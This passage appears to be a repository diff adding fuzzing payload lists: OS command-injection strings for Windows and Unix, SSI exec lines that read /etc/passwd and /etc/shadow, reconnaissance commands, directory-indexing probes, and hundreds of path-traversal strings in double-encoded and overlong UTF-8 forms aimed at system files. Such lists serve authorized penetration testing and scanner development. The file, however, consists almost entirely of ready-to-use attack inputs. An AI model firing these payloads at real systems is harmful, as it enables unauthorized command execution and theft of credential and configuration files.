remove-itemproperty
rename-itemproperty
set-itemproperty
get-psprovider
set-psdebug
add-pssnapin
get-pssnapin
remove-pssnapin
quest
read-host
remove-item
rename-item
rename-itemproperty
run/call
select-object
get-service
new-service
restart-service
resume-service
set-service
sort-object
start-service
stop-service
suspend-service
start-sleep
switch
select-string
tee-object
new-timespan
trace-command
get-tracesource
set-tracesource
start-transcript
stop-transcript
get-uiculture
get-unique
update-formatdata
update-typedata
clear-variable
get-variable
new-variable
remove-variable
set-variable
where-object
where
while
get-wmiobject
write-debug
write-error
write-output
write-progress
write-verbose
write-warning

20
attack/os-cmd-execution/OSCommandInject.Windows.txt Normal file
View file

@ -0,0 +1,20 @@
+|+Dir+c:\
$+|+Dir+c:\
%26%26+|+dir c:\
$%26%26dir c:\
%0a+dir+c:\
+|+Dir+c:%255c
$+|+Dir+c:%255c
%26%26+|+dir c:%255c
$%26%26dir+c:%255c
%0a+dir+c:%255c
+|+Dir+c:%2f
$+|+Dir+c:%2f
%26%26+|+dir c:%2f
$%26%26dir+c:%2f
%0a+dir+c:%2f
+dir+c:\+|
+|+dir+c:\+|
+|+dir+c:%2f+|
dir+c:\
||+dir|c:\

70
attack/os-cmd-execution/command-execution-unix.txt Normal file
View file

@ -0,0 +1,70 @@
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
/index.html|id|
;id;
;id
;netstat -a;
;id;
|id
|/usr/bin/id
|id|
|/usr/bin/id|
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0Aid
%0A/usr/bin/id%0A
%0Aid%0A
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id

6
attack/os-cmd-execution/source-disc-cmd-exec-traversal.txt Normal file
View file

@ -0,0 +1,6 @@
..%255c
.%5c../..%5c
/..%c0%9v../
/..%c0%af../
/..%255c..%255c

10
attack/os-cmd-execution/useful-commands-unix.txt Normal file
View file

@ -0,0 +1,10 @@
uname -n -s
whoami
pwd
last
cat /etc/passwd
ls -la /tmp
ls -la /home
ping -i 30 127.0.0.1
ping 127.0.0.1
ping -n 30

3
attack/os-cmd-execution/useful-commands-windows.txt Normal file
View file

@ -0,0 +1,3 @@
ver
chdir
echo %USERNAME%

7
attack/os-dir-indexing/directory-indexing.txt Normal file
View file

@ -0,0 +1,7 @@
;dir
`dir`
|dir|
|dir
/%3f.jsp
?M=D
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

6
attack/path-traversal/path-traversal-windows.txt Normal file
View file

@ -0,0 +1,6 @@
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
C:/boot.ini
C:\boot.ini
D:\inetpub\wwwroot\global.asa
D:/inetpub/wwwroot/global.asa

887
attack/path-traversal/traversals-8-deep-exotic-encoding.txt Normal file
View file

@ -0,0 +1,887 @@
/../{FILE}
/../../{FILE}
/../../../{FILE}
/../../../../{FILE}
/../../../../../{FILE}
/../../../../../../{FILE}
/../../../../../../../{FILE}
/../../../../../../../../{FILE}
/..%2f{FILE}
/..%2f..%2f{FILE}
/..%2f..%2f..%2f{FILE}
/..%2f..%2f..%2f..%2f{FILE}
/..%2f..%2f..%2f..%2f..%2f{FILE}
/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
/%2e%2e/{FILE}
/%2e%2e/%2e%2e/{FILE}
/%2e%2e/%2e%2e/%2e%2e/{FILE}
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
/%2e%2e%2f{FILE}
/%2e%2e%2f%2e%2e%2f{FILE}
/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
/..%252f{FILE}
/..%252f..%252f{FILE}
/..%252f..%252f..%252f{FILE}
/..%252f..%252f..%252f..%252f{FILE}
/..%252f..%252f..%252f..%252f..%252f{FILE}
/..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
/%252e%252e/{FILE}
/%252e%252e/%252e%252e/{FILE}
/%252e%252e/%252e%252e/%252e%252e/{FILE}
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
/%252e%252e%252f{FILE}
/%252e%252e%252f%252e%252e%252f{FILE}
/%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
/..\{FILE}
/..\..\{FILE}
/..\..\..\{FILE}
/..\..\..\..\{FILE}
/..\..\..\..\..\{FILE}
/..\..\..\..\..\..\{FILE}
/..\..\..\..\..\..\..\{FILE}
/..\..\..\..\..\..\..\..\{FILE}
/..%255c{FILE}
/..%255c..%255c{FILE}
/..%255c..%255c..%255c{FILE}
/..%255c..%255c..%255c..%255c{FILE}
/..%255c..%255c..%255c..%255c..%255c{FILE}
/..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
/..%5c..%5c{FILE}
/..%5c..%5c..%5c{FILE}
/..%5c..%5c..%5c..%5c{FILE}
/..%5c..%5c..%5c..%5c..%5c{FILE}
/..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
/%2e%2e\{FILE}
/%2e%2e\%2e%2e\{FILE}
/%2e%2e\%2e%2e\%2e%2e\{FILE}
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
/%2e%2e%5c{FILE}
/%2e%2e%5c%2e%2e%5c{FILE}
/%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/%252e%252e\{FILE}
/%252e%252e\%252e%252e\{FILE}
/%252e%252e\%252e%252e\%252e%252e\{FILE}
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
/%252e%252e%255c{FILE}
/%252e%252e%255c%252e%252e%255c{FILE}
/%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
/..%c0%af{FILE}
/..%c0%af..%c0%af{FILE}
/..%c0%af..%c0%af..%c0%af{FILE}
/..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
/%c0%ae%c0%ae/{FILE}
/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
/%c0%ae%c0%ae%c0%af{FILE}
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
/..%25c0%25af{FILE}
/..%25c0%25af..%25c0%25af{FILE}
/..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
/%25c0%25ae%25c0%25ae/{FILE}
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
/%25c0%25ae%25c0%25ae%25c0%25af{FILE}
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
/..%c1%9c{FILE}
/..%c1%9c..%c1%9c{FILE}
/..%c1%9c..%c1%9c..%c1%9c{FILE}
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
/%c0%ae%c0%ae\{FILE}
/%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
/%c0%ae%c0%ae%c1%9c{FILE}
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
/..%25c1%259c{FILE}
/..%25c1%259c..%25c1%259c{FILE}
/..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
/%25c0%25ae%25c0%25ae\{FILE}
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
/%25c0%25ae%25c0%25ae%25c1%259c{FILE}
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
/..%%32%66{FILE}
/..%%32%66..%%32%66{FILE}
/..%%32%66..%%32%66..%%32%66{FILE}
/..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
/%%32%65%%32%65/{FILE}
/%%32%65%%32%65/%%32%65%%32%65/{FILE}
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
/%%32%65%%32%65%%32%66{FILE}
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
/..%%35%63{FILE}
/..%%35%63..%%35%63{FILE}
/..%%35%63..%%35%63..%%35%63{FILE}
/..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
/%%32%65%%32%65/{FILE}
/%%32%65%%32%65/%%32%65%%32%65/{FILE}
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
/%%32%65%%32%65%%35%63{FILE}
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
